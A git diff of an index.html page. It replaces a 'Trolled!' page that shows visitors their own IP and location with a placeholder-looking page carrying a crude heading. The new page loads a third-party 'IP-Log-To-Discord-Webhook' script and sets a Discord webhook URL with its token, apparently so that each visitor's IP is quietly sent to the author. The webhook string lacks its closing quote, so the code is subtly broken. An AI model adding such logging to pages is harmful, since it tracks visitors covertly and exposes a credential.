--- a/index.html
+++ b/index.html
@@ -1,58 +1,14 @@
 <!DOCTYPE html>
-<html>
+<html lang="en">
 <head>
-    <style>
-        body {
-          font-family: Arial, sans-serif;
-          font-size: 200%;
-        }
-        body {
-          background-color: black;
-          color: white;
-        }
-        h1, h2, h3, p {
-          text-shadow: 2px 2px 2px rgba(255, 165, 0);
-        }
-        body {
-          margin: 0;
-          padding: 2em;
-        }
-      </style>
-    <title>Trolled!</title>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>iBalls thing</title>
 </head>
 <body>
-    <h1>Some of your Information</h1>
-    <hr>
-    <h2>Some info about you:</h2>
-    <p><strong>IP Address:</strong> <span id="ip_address"></span></p>
-    <p><strong>Country Name:</strong> <span id="country_name"></span></p>
-    <p><strong>State name:</strong> <span id="region_name"></span></p>
-    <p><strong>City Name:</strong> <span id="city_name"></span></p>
-    <p><strong>Latitude:</strong> <span id="latitude"></span></p>
-    <p><strong>Longitude:</strong> <span id="longitude"></span></p>
-    <hr>
-    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
-    <script>
-        $(document).ready(function() {
-            $.getJSON("https://ipapi.co/json/", function(data) {
-                $("#ip_address").text(data.ip);
-                $("#country_name").text(data.country_name);
-                $("#region_name").text(data.region);
-                $("#city_name").text(data.city);
-                $("#latitude").text(data.latitude);
-                $("#longitude").text(data.longitude);
-            });
+<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
+<script src="https://cdn.jsdelivr.net/gh/luisoos/IP-Log-To-Discord-Webhook/index.js"></script>
+<script>var webHookUrl = "https://discord.com/api/webhooks/1209161526293037096/lMLasrq0MbXJU-rroRH_iWb5LRTZmmkAb9C4y2WhjsS5-DJoWS94dkSEjwSv4IHyqONG;</script>
+<h1>fucking skdi</h1>
+<p>This is a paragraph.</p>
 
-            $("#user_agent").text(navigator.userAgent);
-        });
-    </script>
 </body>
 </html>
-<h2>
-    TacoTake
-</h2>
-<h3>
-    Tacoamerman on github
-</h3>
